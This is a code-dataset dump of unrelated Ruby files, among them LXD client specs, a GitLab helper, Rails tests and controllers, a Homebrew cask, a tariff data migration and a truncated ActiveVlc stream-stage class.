expect(@client.auto_sync).to eq(false)
end
it "configures auto-synchronization with instance methods" do
@client.auto_sync = false
expect(@client.auto_sync).to eq(false)
end
end
end
describe "authentication" do
before do
@client = Hyperkit.client
end
describe "with module level config" do
it "sets client credentials with .configure" do
Hyperkit.configure do |config|
config.client_cert = '/tmp/cert'
config.client_key = '/tmp/key'
end
expect(Hyperkit.client.client_cert).to eq('/tmp/cert')
expect(Hyperkit.client.client_key).to eq('/tmp/key')
end
it "sets client credentials with module methods" do
Hyperkit.client_cert = '/tmp/cert'
Hyperkit.client_key = '/tmp/key'
expect(Hyperkit.client.client_cert).to eq('/tmp/cert')
expect(Hyperkit.client.client_key).to eq('/tmp/key')
end
end
describe "with class level config" do
it "sets client credentials with .configure" do
@client.configure do |config|
config.client_cert = '/tmp/cert'
config.client_key = '/tmp/key'
end
expect(@client.client_cert).to eq('/tmp/cert')
expect(@client.client_key).to eq('/tmp/key')
end
it "sets client credentials with instance methods" do
@client.client_cert = '/tmp/cert'
@client.client_key = '/tmp/key'
expect(@client.client_cert).to eq('/tmp/cert')
expect(@client.client_key).to eq('/tmp/key')
end
end
end
# Hyperkit::Client#agent — the underlying Sawyer HTTP agent.
describe ".agent" do
  it "acts like a Sawyer agent" do
    expect(Hyperkit.client.agent).to respond_to :start
  end

  # The agent must be memoized: two reads return the same object.
  it "caches the agent" do
    agent = Hyperkit.client.agent
    expect(agent.object_id).to eq(Hyperkit.client.agent.object_id)
  end
end # .agent
# Hyperkit::Client#root — GET on the LXD API root.
describe ".root" do
  it "fetches the API root" do
    # Replays the recorded 'root' cassette instead of hitting a live server.
    VCR.use_cassette 'root' do
      root = Hyperkit.client.root
      expect(root[:metadata]).to eq(['/1.0'])
    end
  end
end # .root
describe ".last_response", :vcr do
it "caches the last agent response" do
client = Hyperkit::Client.new(api_endpoint: 'https://192.168.103.101:8443', verify_ssl: false)
expect(client.last_response).to be_nil
client.get "/"
expect(client.last_response.status).to eq(200)
end
end # .last_response
describe ".get", :vcr do
it "handles query params" do
Hyperkit.get "/", :foo => "bar"
assert_requested :get, "https://192.168.103.101:8443?foo=bar"
end
it "handles headers" do
request = stub_get("/zen").
with(:query => {:foo => "bar"}, :headers => {:accept => "text/plain"})
Hyperkit.get "/zen", :foo => "bar", :accept => "text/plain"
assert_requested request
end
end # .get
describe ".head", :vcr do
it "handles query params" do
Hyperkit.head "/", :foo => "bar"
assert_requested :head, "https://192.168.103.101:8443?foo=bar"
end
it "handles headers" do
request = stub_head("/zen").
with(:query => {:foo => "bar"}, :headers => {:accept => "text/plain"})
Hyperkit.head "/zen", :foo => "bar", :accept => "text/plain"
assert_requested request
end
end # .head
describe "when making requests" do
before do
@client = Hyperkit.client
end
it "Accepts application/json by default" do
VCR.use_cassette 'root' do
root_request = stub_get("/").
with(:headers => {:accept => "application/json"})
@client.get "/"
assert_requested root_request
expect(@client.last_response.status).to eq(200)
end
end
it "allows Accept'ing another media type" do
root_request = stub_get("/").
with(:headers => {:accept => "application/vnd.lxd.beta.diff+json"})
@client.get "/", :accept => "application/vnd.lxd.beta.diff+json"
assert_requested root_request
expect(@client.last_response.status).to eq(200)
end
it "sets a default user agent" do
root_request = stub_get("/").
with(:headers => {:user_agent => Hyperkit::Default.user_agent})
@client.get "/"
assert_requested root_request
expect(@client.last_response.status).to eq(200)
end
it "sets a custom user agent" do
user_agent = "Mozilla/5.0 I am Spartacus!"
root_request = stub_get("/").
with(:headers => {:user_agent => user_agent})
client = Hyperkit::Client.new(:user_agent => user_agent)
client.get "/"
assert_requested root_request
expect(client.last_response.status).to eq(200)
end
it "sets a proxy server" do
Hyperkit.configure do |config|
config.proxy = 'http://proxy.example.com:80'
end
conn = Hyperkit.client.send(:agent).instance_variable_get(:"@conn")
expect(conn.proxy[:uri].to_s).to eq('http://proxy.example.com')
end
it "passes along request headers for POST" do
headers = {"X-LXD-Foo" => "bar"}
root_request = stub_post("/").
with(:headers => headers).
to_return(:status => 201)
client = Hyperkit::Client.new
client.post "/", :headers => headers
assert_requested root_request
expect(client.last_response.status).to eq(201)
end
end
describe "redirect handling" do
it "follows redirect for 301 response" do
client = Hyperkit::Client.new
original_request = stub_get("/foo").
to_return(:status => 301, :headers => { "Location" => "/bar" })
redirect_request = stub_get("/bar").to_return(:status => 200)
client.get("/foo")
assert_requested original_request
assert_requested redirect_request
end
it "follows redirect for 302 response" do
client = Hyperkit::Client.new
original_request = stub_get("/foo").
to_return(:status => 302, :headers => { "Location" => "/bar" })
redirect_request = stub_get("/bar").to_return(:status => 200)
client.get("/foo")
assert_requested original_request
assert_requested redirect_request
end
it "follows redirect for 307 response" do
client = Hyperkit::Client.new
original_request = stub_post(lxd_url("/foo")).
with(:body => { :some_property => "some_value" }.to_json).
to_return(:status => 307, :headers => { "Location" => "/bar" })
redirect_request = stub_post(lxd_url("/bar")).
with(:body => { :some_property => "some_value" }.to_json).
to_return(:status => 201, :headers => { "Location" => "/bar" })
client.post("/foo", { :some_property => "some_value" })
assert_requested original_request
assert_requested redirect_request
end
it "follows redirects for supported HTTP methods" do
client = Hyperkit::Client.new
http_methods = [:head, :get, :post, :put, :patch, :delete]
http_methods.each do |http|
original_request = stub_request(http, lxd_url("/foo")).
to_return(:status => 301, :headers => { "Location" => "/bar" })
redirect_request = stub_request(http, lxd_url("/bar")).
to_return(:status => 200)
client.send(http, "/foo")
assert_requested original_request
assert_requested redirect_request
end
end
it "does not change HTTP method when following a redirect" do
client = Hyperkit::Client.new
original_request = stub_delete("/foo").
to_return(:status => 301, :headers => { "Location" => "/bar" })
redirect_request = stub_delete("/bar").to_return(:status => 200)
client.delete("/foo")
assert_requested original_request
assert_requested redirect_request
other_methods = [:head, :get, :post, :put, :patch]
other_methods.each do |http|
assert_not_requested http, lxd_url("/bar")
end
end
it "follows at most 3 consecutive redirects" do
client = Hyperkit::Client.new
original_request = stub_get("/a").
to_return(:status => 302, :headers => { "Location" => "/b" })
first_redirect = stub_get("/b").
to_return(:status => 302, :headers => { "Location" => "/c" })
second_redirect = stub_get("/c").
to_return(:status => 302, :headers => { "Location" => "/d" })
third_redirect = stub_get("/d").
to_return(:status => 302, :headers => { "Location" => "/e" })
fourth_redirect = stub_get("/e").to_return(:status => 200)
expect { client.get("/a") }.to raise_error(Hyperkit::Middleware::RedirectLimitReached)
assert_requested original_request
assert_requested first_redirect
assert_requested second_redirect
assert_requested third_redirect
assert_not_requested fourth_redirect
end
end
context "error handling" do
before do
VCR.turn_off!
end
after do
VCR.turn_on!
end
it "raises on 404" do
stub_get('/booya').to_return(:status => 404)
expect { Hyperkit.get('/booya') }.to raise_error Hyperkit::NotFound
end
it "raises on 500" do
stub_get('/boom').to_return(:status => 500)
expect { Hyperkit.get('/boom') }.to raise_error Hyperkit::InternalServerError
end
it "includes a message" do
stub_get('/boom').
to_return \
:status => 422,
:headers => {
:content_type => "application/json",
},
:body => {:message => "Go away"}.to_json
begin
Hyperkit.get('/boom')
rescue Hyperkit::UnprocessableEntity => e
expect(e.message).to include("GET https://192.168.103.101:8443/boom: 422 - Go away")
end
end
it "includes an error" do
stub_get('/boom').
to_return \
:status => 422,
:headers => {
:content_type => "application/json",
},
:body => {:error => "Go away"}.to_json
begin
Hyperkit.get('/boom')
rescue Hyperkit::UnprocessableEntity => e
expect(e.message).to include("GET https://192.168.103.101:8443/boom: 422 - Error: Go away")
end
end
it "includes an error summary" do
stub_get('/boom').
to_return \
:status => 422,
:headers => {
:content_type => "application/json",
},
:body => {
:message => "Go away",
:errors => [
:seriously => "Get out of here",
:no_really => "Leave now"
]
}.to_json
begin
Hyperkit.get('/boom')
rescue Hyperkit::UnprocessableEntity => e
expect(e.message).to include("GET https://192.168.103.101:8443/boom: 422 - Go away")
expect(e.message).to include(" seriously: Get out of here")
expect(e.message).to include(" no_really: Leave now")
end
end
it "exposes errors array" do
stub_get('/boom').
to_return \
:status => 422,
:headers => {
:content_type => "application/json",
},
:body => {
:message => "Go away",
:errors => [
:seriously => "Get out of here",
:no_really => "Leave now"
]
}.to_json
begin
Hyperkit.get('/boom')
rescue Hyperkit::UnprocessableEntity => e
expect(e.errors.first[:seriously]).to eq("Get out of here")
expect(e.errors.first[:no_really]).to eq("Leave now")
end
end
it "raises on asynchronous errors" do
stub_get('/boom').
to_return \
:status => 200,
:headers => {
:content_type => "application/json",
},
:body => {
metadata: {
id: "e81ee5e8-6cce-46fd-b010-2c595ca66ed2",
class: "task",
created_at: Time.parse("2016-03-21 11:00:21 -0400"),
updated_at: Time.parse("2016-03-21 11:00:21 -0400"),
status: "Failure",
status_code: 400,
resources: nil,
metadata: nil,
may_cancel: false,
err:
"The image already exists: c22e4941ad01ef4b5e69908b7de21105e06b8ac7a31e1ccd153826a3b15ee1ba"
}
}.to_json
begin
Hyperkit.get('/boom')
rescue Hyperkit::BadRequest=> e
expect(e.message).to include("400 - Error: The image already exists")
end
end
it "raises on unknown client errors" do
stub_get('/user').to_return \
:status => 418,
:headers => {
:content_type => "application/json",
},
:body => {:message => "I'm a teapot"}.to_json
expect { Hyperkit.get('/user') }.to raise_error Hyperkit::ClientError
end
it "raises on unknown server errors" do
stub_get('/user').to_return \
:status => 509,
:headers => {
:content_type => "application/json",
},
:body => {:message => "Bandwidth exceeded"}.to_json
expect { Hyperkit.get('/user') }.to raise_error Hyperkit::ServerError
end
it "handles documentation URLs in error messages" do
stub_get('/user').to_return \
:status => 415,
:headers => {
:content_type => "application/json",
},
:body => {
:message => "Unsupported Media Type",
:documentation_url => "http://developer.github.com/v3"
}.to_json
begin
Hyperkit.get('/user')
rescue Hyperkit::UnsupportedMediaType => e
msg = "415 - Unsupported Media Type"
expect(e.message).to include(msg)
expect(e.documentation_url).to eq("http://developer.github.com/v3")
end
end
it "handles an error response with an array body" do
stub_get('/user').to_return \
:status => 500,
:headers => {
:content_type => "application/json"
},
:body => [].to_json
expect { Hyperkit.get('/user') }.to raise_error Hyperkit::ServerError
end
end
end
| 31.132576 | 104 | 0.592895 |
abf23650068de43d093b5c4fabab1982e19d3fac | 97 | require 'mina/appsignal/support'
require 'mina/appsignal/tasks'
require 'mina/appsignal/version'
| 24.25 | 32 | 0.814433 |
18557afcb991a991be226e278361ef0ff29f4518 | 1,921 | # frozen_string_literal: true
module Ci
  # View helpers backing the CI pipeline editor page.
  module PipelineEditorHelper
    include ChecksCollaboration

    # The editor is visible to anyone who can collaborate on the project.
    def can_view_pipeline_editor?(project)
      can_collaborate_with_project?(project)
    end

    # Builds the data attributes consumed by the pipeline editor frontend.
    # Falls back to the project's head commit when the requested branch has no
    # commit (e.g. a newly created branch name), and to zero branches / an
    # empty SHA when the repository does not exist yet.
    def js_pipeline_editor_data(project)
      initial_branch = params[:branch_name]
      latest_commit = project.repository.commit(initial_branch) || project.commit
      commit_sha = latest_commit ? latest_commit.sha : ''
      total_branches = project.repository_exists? ? project.repository.branch_count : 0
      {
        # NOTE(review): this first key is a Symbol (:"ci-config-path") while the
        # rest are Strings — harmless once serialized into HTML data attributes,
        # but inconsistent; confirm before unifying the key types.
        "ci-config-path": project.ci_config_path_or_default,
        "ci-examples-help-page-path" => help_page_path('ci/examples/index'),
        "ci-help-page-path" => help_page_path('ci/index'),
        "default-branch" => project.default_branch_or_main,
        "empty-state-illustration-path" => image_path('illustrations/empty-state/empty-dag-md.svg'),
        "initial-branch-name" => initial_branch,
        "lint-help-page-path" => help_page_path('ci/lint', anchor: 'check-cicd-syntax'),
        "lint-unavailable-help-page-path" => help_page_path('ci/pipeline_editor/index', anchor: 'configuration-validation-currently-not-available-message'),
        "needs-help-page-path" => help_page_path('ci/yaml/index', anchor: 'needs'),
        "new-merge-request-path" => namespace_project_new_merge_request_path,
        # Empty etag when there is no commit to key the pipeline query on.
        "pipeline_etag" => latest_commit ? graphql_etag_pipeline_sha_path(commit_sha) : '',
        "pipeline-page-path" => project_pipelines_path(project),
        "project-path" => project.path,
        "project-full-path" => project.full_path,
        "project-namespace" => project.namespace.full_path,
        "runner-help-page-path" => help_page_path('ci/runners/index'),
        "total-branches" => total_branches,
        "yml-help-page-path" => help_page_path('ci/yaml/index')
      }
    end
  end
end
Ci::PipelineEditorHelper.prepend_mod_with('Ci::PipelineEditorHelper')
| 45.738095 | 156 | 0.698594 |
4a133a3ca145679200304792ac5961a699d42093 | 1,269 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'google/apis/doubleclicksearch_v2/service.rb'
require 'google/apis/doubleclicksearch_v2/classes.rb'
require 'google/apis/doubleclicksearch_v2/representations.rb'
module Google
  module Apis
    # DoubleClick Search API
    #
    # Reports and modifies your advertising data in DoubleClick Search (for example,
    # campaigns, ad groups, keywords, and conversions).
    #
    # @see https://developers.google.com/doubleclick-search/
    module DoubleclicksearchV2
      # API version targeted by this generated client.
      VERSION = 'V2'
      # Discovery-document revision the client was generated from (YYYYMMDD).
      REVISION = '20160727'

      # View and manage your advertising data in DoubleClick Search
      AUTH_DOUBLECLICKSEARCH = 'https://www.googleapis.com/auth/doubleclicksearch'
    end
  end
end
| 35.25 | 84 | 0.747833 |
9129f545078948d74036da159580d8ddd4a163d5 | 378 | require 'rails_helper'
# Admin can edit an organization's tax status from the organization edit page.
feature 'Update tax status' do
  background do
    # Seed one organization and open its admin edit page.
    # NOTE(review): '/admin/organizations/parent-agency' presumably matches the
    # factory's default slug — confirm against the factory definition.
    create(:organization)
    login_super_admin
    visit '/admin/organizations/parent-agency'
  end

  scenario 'with tax status' do
    fill_in 'organization_tax_status', with: '501(c)(3)'
    click_button 'Save changes'
    # After saving, the persisted value is re-rendered in the same field.
    expect(find_field('organization_tax_status').value).to eq '501(c)(3)'
  end
end
| 23.625 | 73 | 0.719577 |
873e3f73bb7af87f1e3e99892b336cea49ace7d9 | 607 | module LanguageServer
module Protocol
module Interface
# LSP `LinkedEditingRangeOptions` structure: carries the optional
# `workDoneProgress` capability flag as an immutable attribute hash.
class LinkedEditingRangeOptions
  # Raw (frozen) attribute hash backing this structure.
  attr_reader :attributes

  # @param work_done_progress [Boolean, nil] stored under :workDoneProgress
  #   only when truthy; falsy values leave the hash empty.
  def initialize(work_done_progress: nil)
    attrs = {}
    attrs[:workDoneProgress] = work_done_progress if work_done_progress
    @attributes = attrs.freeze
  end

  # @return [boolean] the stored flag; raises KeyError when the flag was
  #   never set, preserving the strict-fetch accessor contract.
  def work_done_progress
    attributes.fetch(:workDoneProgress)
  end

  # @return [Hash] the attribute hash itself (not a copy).
  def to_hash
    attributes
  end

  # JSON serialization of the attribute hash.
  def to_json(*args)
    attributes.to_json(*args)
  end
end
end
end
end
| 19.580645 | 83 | 0.601318 |
ac6e84363ad04c34599a85ce6f6fa04ec305cb25 | 245 | require 'test_helper'
# Smoke tests: ActivitiesController's index and show actions respond 2xx.
class ActivitiesControllerTest < ActionController::TestCase
  test "should get index" do
    get :index
    assert_response :success
  end

  # NOTE(review): no :id param is passed to :show; presumably the action does
  # not require one — confirm against the routes/controller.
  test "should get show" do
    get :show
    assert_response :success
  end
end
| 16.333333 | 59 | 0.726531 |
e259207c8251cf468c6a743c284a962d114ae9a8 | 1,084 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "action_cable/engine"
require "sprockets/railtie"
# require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
# Application class for the blog app; all framework configuration not placed
# in config/environments or config/initializers lives here.
module BlogApp
  class Application < Rails::Application
    # Initialize configuration defaults for originally generated Rails version.
    config.load_defaults 5.2

    # Settings in config/environments/* take precedence over those specified here.
    # Application configuration can go into files in config/initializers
    # -- all .rb files in that directory are automatically loaded after loading
    # the framework and any gems in your application.

    # Don't generate system test files.
    config.generators.system_tests = nil
  end
end
| 31.882353 | 82 | 0.77952 |
d51376098458d13bc9ef73e47e0b3f8343b954dc | 834 | cask "wondershare-uniconverter" do
version "12.5.2.6"
# NOTE(review): the checksum is skipped even though the version is pinned —
# upstream presumably republishes the same URL in place; confirm, otherwise
# pin a sha256 for this version.
sha256 :no_check
url "https://download.wondershare.com/cbs_down/video-converter-ultimate-mac_full735.dmg"
name "UniConverter"
desc "Video editing software"
homepage "https://videoconverter.wondershare.com/"

app "Wondershare UniConverter.app"

# Residual files removed by `brew uninstall --zap`.
zap trash: [
  "~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/com.wondershare.video-converter-ultimate.sfl*",
  "~/Library/Caches/com.Wondershare.Video-Converter-Ultimate",
  "~/Library/Caches/com.wondershare.helper_compact",
  "~/Library/Cookies/com.Wondershare.Video-Converter-Ultimate.binarycookies",
  "~/Library/Preferences/com.Wondershare.Video-Converter-Ultimate.plist",
  "~/Library/Preferences/com.wondershare.helper_compact",
]
end
| 39.714286 | 161 | 0.772182 |
91bf2dce48ccab67641b2434147df91c79bf8844 | 2,301 | =begin
The CHIEF transformer does not handle TAMT (measure type) and RVTT (measure type description)
record types, so we created these records manually.
2019-01-10_KBT009(19010).txt:2
"TAMT ","09/01/2019:10:37:00","I","487","EX","EXF",null,null,"09/01/2019:10:36:00",
2018-12-28_KBT009(18362).txt:4987
"RVTT ","27/12/2018:10:27:00","I","487",null,null,"27/12/2018:10:25:00",null,"N",null,null,"4","N","Y","CIDER AND PERRY EXCEEDING 6.9% - NOT EXCEEDING 7.5% ABV","Y","Y","E",
=end
# !Note - this migration is not completely correct
# Instead of EXF we should use DHG code (487)
# This will be fixed in data migration on 10.12.2019
TradeTariffBackend::DataMigrator.migration do
  name 'Create EXF national measure type with description'

  up do
    applicable do
      MeasureType.where(measure_type_id: 'EXF').blank?
      # The presence check above is computed but discarded: the trailing
      # `false` makes this block always return false, i.e. the migration is
      # deliberately disabled (see the note at the top of the file about the
      # 10.12.2019 follow-up data migration).
      false
    end

    apply do
      # Primary keys must be unrestricted to insert records with explicit ids.
      MeasureType.unrestrict_primary_key
      MeasureType.create(measure_type_id: 'EXF',
                         validity_start_date: Date.new(2019, 1, 9),
                         validity_end_date: nil,
                         trade_movement_code: 0,
                         priority_code: 5,
                         measure_component_applicable_code: '0',
                         measure_type_acronym: 'EXF',
                         origin_dest_code: 0,
                         order_number_capture_code: 2,
                         measure_explosion_level: 20,
                         measure_type_series_id: 'Q',
                         national: true,
                         operation: 'C',
                         operation_date: nil)

      MeasureTypeDescription.unrestrict_primary_key
      MeasureTypeDescription.create(measure_type_id: 'EXF',
                                    language_id: 'EN',
                                    description: 'EXCISE - FULL, 487, CIDER AND PERRY EXCEEDING 6.9% - NOT EXCEEDING 7.5% ABV',
                                    national: true,
                                    operation: 'C')
    end
  end

  down do
    # Rollback intentionally left commented out alongside the disabled up-block.
    # applicable {
    #   MeasureType.where(measure_type_id: 'EXF').present?
    # }
    # apply {
    #   MeasureTypeDescription.where(measure_type_id: 'EXF').map(&:destroy)
    #   MeasureType.where(measure_type_id: 'EXF').map(&:destroy)
    # }
  end
end
| 37.721311 | 179 | 0.564537 |
08c5c7346ffa7fe2d4e69467e44036d4046575df | 6,271 | require 'date'
require_relative '../../lib/params_ready/value/validator.rb'
require_relative '../test_helper'
module ParamsReady
module Value
class ConstraintTest < MiniTest::Test
# Range constraints: membership in 1..3 plus clamping to the range bounds.
def test_range_constraint_works_with_numbers
  c = Constraint.instance(1..3)
  assert(c.valid?(1))
  assert(c.valid?(2))
  assert(c.valid?(3))
  refute(c.valid?(0))
  refute(c.valid?(4))
  # Range constraints support clamping: out-of-range values snap to the bounds,
  # in-range values pass through unchanged.
  assert c.clamp?
  assert_equal 1, c.clamp(0)
  assert_equal 2, c.clamp(2)
  assert_equal 3, c.clamp(4)
end
def test_indefinite_values_not_subject_to_constraints
c = Constraint.instance(1..3)
v = Validator.instance(c)
assert_equal([Extensions::Undefined, nil], v.validate(Extensions::Undefined, nil))
assert_equal([nil, nil], v.validate(nil, nil))
end
def test_undefine_strategy_returns_undefined
c = Validator.instance(Constraint.instance(1..3), strategy: :undefine)
assert_equal([Extensions::Undefined, nil], c.validate(5, nil))
end
def test_range_constraint_works_with_date
today = Date.today
past = today - 10
yesterday = today - 1
tomorrow = today + 1
future = today + 10
c = Constraint.instance(yesterday..tomorrow)
assert(c.valid?(yesterday))
assert(c.valid?(today))
assert(c.valid?(tomorrow))
refute(c.valid?(past))
refute(c.valid?(future))
end
def test_enum_constraint_works_with_numbers
c = Constraint.instance([1, 3])
assert(c.valid?(1))
assert(c.valid?(3))
refute(c.valid?(2))
refute(c.valid?(0))
refute(c.valid?(4))
end
def test_enum_constraint_works_with_dates
today = Date.today
past = today - 10
yesterday = today - 1
tomorrow = today + 1
future = today + 10
c = Constraint.instance([yesterday, tomorrow])
assert(c.valid?(yesterday))
assert(c.valid?(tomorrow))
refute(c.valid?(today))
refute(c.valid?(past))
refute(c.valid?(future))
end
def test_enum_constraint_works_with_strings
c = Constraint.instance(%w[yesterday tomorrow])
assert(c.valid?('yesterday'))
assert(c.valid?('tomorrow'))
refute(c.valid?('today'))
end
def test_enum_constraint_works_with_symbols
c = Constraint.instance([:yesterday, :tomorrow])
assert(c.valid?(:yesterday))
assert(c.valid?(:tomorrow))
refute(c.valid?(:today))
end
def test_symbol_enum_constraint_works_with_strings
c = Constraint.instance([:yesterday, :tomorrow])
assert(c.valid?('yesterday'))
assert(c.valid?('tomorrow'))
refute(c.valid?('today'))
end
def test_operator_constraint_raises_with_invalid_operator
ex = assert_raises do
OperatorConstraint.new(:x, 1)
end
assert '', ex.message
end
def test_operator_that_do_not_clamp_raise_if_strategy_clamp
%i(< > =~).each do |op|
err = assert_raises(ParamsReadyError) do
Validator.instance(:operator, op, 5, strategy: :clamp)
end
assert_equal "Clamping not applicable", err.message
end
end
def test_operator_constraint_works
c = OperatorConstraint.new(:<, 1)
assert c.valid?(0)
refute c.valid?(1)
refute c.clamp?
c = OperatorConstraint.new(:<=, 1)
assert c.valid?(1)
refute c.valid?(2)
assert c.clamp?
assert_equal 0, c.clamp(0)
assert_equal 1, c.clamp(100)
c = OperatorConstraint.new(:==, 1)
assert c.valid?(1)
refute c.valid?(2)
assert c.clamp?
assert_equal 1, c.clamp(1)
assert_equal 1, c.clamp(-100)
c = OperatorConstraint.new(:>=, 1)
refute c.valid?(0)
assert c.valid?(1)
assert c.clamp?
assert_equal 100, c.clamp(100)
assert_equal 1, c.clamp(-100)
c = OperatorConstraint.new(:>, 1)
assert c.valid?(2)
refute c.valid?(1)
refute c.clamp?
end
def test_operator_constraint_builder_works_with_proc
c = OperatorConstraint.build(:<) do
1
end
assert c.valid?(0)
refute c.valid?(1)
end
def test_operator_constraint_works_with_proc
one = Proc.new do
1
end
c = OperatorConstraint.new(:<, one)
assert c.valid?(0)
refute c.valid?(1)
refute c.clamp?
c = OperatorConstraint.new(:<=, one)
assert c.valid?(1)
refute c.valid?(2)
assert c.clamp?
assert_equal 1, c.clamp(5)
c = OperatorConstraint.new(:==, one)
assert c.valid?(1)
refute c.valid?(2)
assert c.clamp?
assert_equal 1, c.clamp(5)
c = OperatorConstraint.new(:>=, one)
assert c.valid?(1)
refute c.valid?(0)
assert c.clamp?
assert_equal 1, c.clamp(0)
c = OperatorConstraint.new(:>, one)
assert c.valid?(2)
refute c.valid?(1)
refute c.clamp?
end
def test_operator_constraint_works_with_method
c = OperatorConstraint.new(:<, method(:one))
assert c.valid?(0)
refute c.valid?(1)
refute c.clamp?
c = OperatorConstraint.new(:<=, method(:one))
assert c.valid?(1)
refute c.valid?(2)
assert c.clamp?
assert_equal 1, c.clamp(5)
c = OperatorConstraint.new(:==, method(:one))
assert c.valid?(1)
refute c.valid?(2)
assert c.clamp?
assert_equal 1, c.clamp(5)
c = OperatorConstraint.new(:>=, method(:one))
assert c.valid?(1)
refute c.valid?(0)
assert c.clamp?
assert_equal 1, c.clamp(0)
c = OperatorConstraint.new(:>, method(:one))
assert c.valid?(2)
refute c.valid?(1)
refute c.clamp?
end
def test_operator_constraint_works_with_regex
c = OperatorConstraint.new(:=~, /a/)
assert c.valid?("cat")
refute c.valid?("cod")
end
# Fixture helper returning a constant, used by the tests above that build
# constraints from Method objects via `method(:one)`.
def one
  1
end
end
end
end | 29.861905 | 90 | 0.57742 |
11311815efa5331a69a14c7e7bfa0342883e8e79 | 3,512 | class Api::V1::AssetEventsController < Api::ApiController
before_action :set_asset_event, only: [:show, :update, :destroy]
before_action :set_asset, only: [:create]
before_action :set_event_type, only: [:create]
# GET /asset_events/:id
# Renders the typed event resolved by the set_asset_event filter, or a 404
# payload when the typed wrapper could not be produced.
def show
  if @typed_event
    render status: 200, json: json_response(:success, data: @typed_event.api_json)
  else
    render status: 404, json: json_response(:fail, data: "Unable to find event.")
  end
end
# DELETE /asset_events/:id
# Destroys the event after an ability check. The parent asset's cached
# inventory payload is evicted before the destroy is attempted, so the cache
# is invalidated even when destruction fails.
# NOTE(review): nothing is rendered on success, so callers receive Rails'
# default empty response — confirm that is intended.
def destroy
  authorize! :update, @asset_event
  Rails.cache.delete("inventory_api" + @asset_event.transam_asset.object_key)
  unless @asset_event.destroy
    @status = :fail
    @message = "Unable to destroy asset event due the following error: #{@asset_event.errors.messages}"
    render status: 400, json: json_response(:fail, message: @message)
  end
end
# PUT/PATCH /asset_events/:id
# Applies permitted params to the typed event; on success evicts the parent
# asset's cached inventory payload and returns the updated event.
def update
  authorize! :update, @typed_event
  if @typed_event.update(form_params)
    Rails.cache.delete("inventory_api" + @asset_event.transam_asset.object_key)
    render status: 200, json: json_response(:success, data: @typed_event.api_json)
  else
    @status = :fail
    @message = "Unable to update asset event due the following error: #{@typed_event.errors.messages}"
    render status: 400, json: json_response(:fail, message: @message)
  end
end
# POST — builds a typed event of the requested type on @asset and persists it.
#
# Fix: the original called `authorize! :update, @event`, but @event is never
# assigned anywhere in this controller, so the ability check always ran
# against nil. Build the event first and authorize the actual record,
# mirroring the checks in #update and #destroy.
def create
  @new_event = @asset.build_typed_event(@event_type.class_name.constantize)
  authorize! :update, @new_event
  @new_event.update(new_form_params)
  if @new_event.save
    # Invalidate the cached inventory payload for the parent asset.
    Rails.cache.delete("inventory_api" + @asset.object_key)
    render status: 200, json: json_response(:success, data: @new_event.api_json)
  else
    @status = :fail
    @message = "Unable to create asset event due the following error: #{@new_event.errors.messages}"
    render status: 400, json: json_response(:fail, message: @message)
  end
end
# before_action for :show/:update/:destroy — looks up the event by object_key
# and wraps it in its concrete subclass.
# NOTE(review): as_typed_event is called even when the lookup returned nil;
# presumably it tolerates a nil argument — confirm.
def set_asset_event
  @asset_event = AssetEvent.find_by(object_key: params[:id])
  @typed_event = AssetEvent.as_typed_event(@asset_event)
  unless @asset_event and @asset_event.viewable_by? current_user
    @status = :fail
    # Both "missing" and "not visible to this user" map to one 404 message.
    message = "Asset event #{params[:id]} not found."
    render status: :not_found, json: json_response(:fail, message: message)
  end
end
# before_action for :create — resolves the parent asset by object_key along
# with its typed counterpart; renders a 404 payload when no asset matches.
def set_asset
  @asset = TransamAsset.find_by(object_key: params[:asset_object_key])
  @typed_asset = TransamAsset.get_typed_asset(@asset)
  unless @asset
    @status = :fail
    message = "Asset #{params[:asset_object_key]} not found."
    render status: :not_found, json: json_response(:fail, message: message)
  end
end
# before_action for :create — resolves the requested event type and verifies
# it is applicable to the typed asset.
#
# Fixes: the original used AssetEventType.find, which raises
# ActiveRecord::RecordNotFound for a missing id, making the `unless
# @event_type` branch unreachable; find_by(id:) returns nil instead. The
# error messages also interpolated params keys that are never sent
# (:event_type / :asset_id) — use the keys this controller actually reads.
def set_event_type
  @event_type = AssetEventType.find_by(id: params[:asset_event_type_id])
  unless @event_type
    @status = :fail
    @data = {id: "Event type #{params[:asset_event_type_id]} not found."}
    render status: :not_found, json: json_response(:fail, data: @data)
  else
    # The type exists but must also be valid for this asset's class.
    unless @typed_asset.event_classes.include? @event_type.class_name.constantize
      @status = :fail
      @data = {id: "Event type #{params[:asset_event_type_id]} not applicable to asset #{params[:asset_object_key]}."}
      render status: :not_found, json: json_response(:fail, data: @data)
    end
  end
end
# Strong parameters for #update: base AssetEvent params plus the concrete
# event subclass's own params.
#
# Fix: @typed_event.class already IS the class constant, so round-tripping it
# through `.name.constantize` was redundant.
def form_params
  params.permit(AssetEvent.allowable_params + @typed_event.class.allowable_params - [:asset_id, :asset_event_type_id])
end
# Strong parameters for #create. Unlike form_params, class_name here comes
# from the AssetEventType record as a String, so constantize is required.
def new_form_params
  params.permit(AssetEvent.allowable_params + @event_type.class_name.constantize.allowable_params - [:asset_id, :asset_event_type_id])
end
end | 36.206186 | 137 | 0.70074 |
081f55e38471e878066660ee7efc603ece555c22 | 839 | ##
## stream_stage.rb
## Login : <lta@still>
## Started on Wed Sep 4 19:35:50 2013 Lta Akr
## $Id$
##
## Author(s):
## - Lta Akr <>
##
## Copyright (C) 2013 Lta Akr
# Pipeline stage modelling VLC's stream-output chain (`--sout`).
module ActiveVlc::Stage
  # A :sout stage holding an ordered chain of sub-stages whose fragments are
  # joined into a single `:sout="#..."` command-line option.
  class Stream < Base
    dump_childs { @chain } # Base DSL: expose children for tree dumps

    def initialize
      super :sout
      @chain = []
    end

    # Appends a stage (or an array of stages, which is flattened in) to the
    # chain; returns self so calls can be chained.
    def <<(stage)
      @chain.push stage
